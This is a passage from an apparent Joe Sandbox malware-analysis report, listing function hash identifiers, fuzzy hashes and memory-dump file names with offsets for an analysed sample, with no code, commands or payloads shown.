                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                                        • Instruction ID: 412b070a6cfac29d3483341d576b47d799f8289c5ec74b8f33628b57c545a75a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a74d5857912f424093c70e21deeb6922a10a882864307659604c18145d6e58bc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CF0651040C7E28ADB234B3E44606B2AFE09B63120B181BD5C8E29B6C7C3159496C3A6
                                                                                                                                                                                                                                                        Function 0098C805 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 969511d52cb304d5ec08fbc219072a631d5f9cce0fba4a4d2ec7c7c08ae3d0b5
                                                                                                                                                                                                                                                        • Instruction ID: 536592959e28123afa4037c2350580ce19c9ad1b3a29476b4b753421617a983c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 969511d52cb304d5ec08fbc219072a631d5f9cce0fba4a4d2ec7c7c08ae3d0b5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCC01234D2A454DF82044F20DC08C79B374AB4F106B806404D417D3211CB31B501EA5D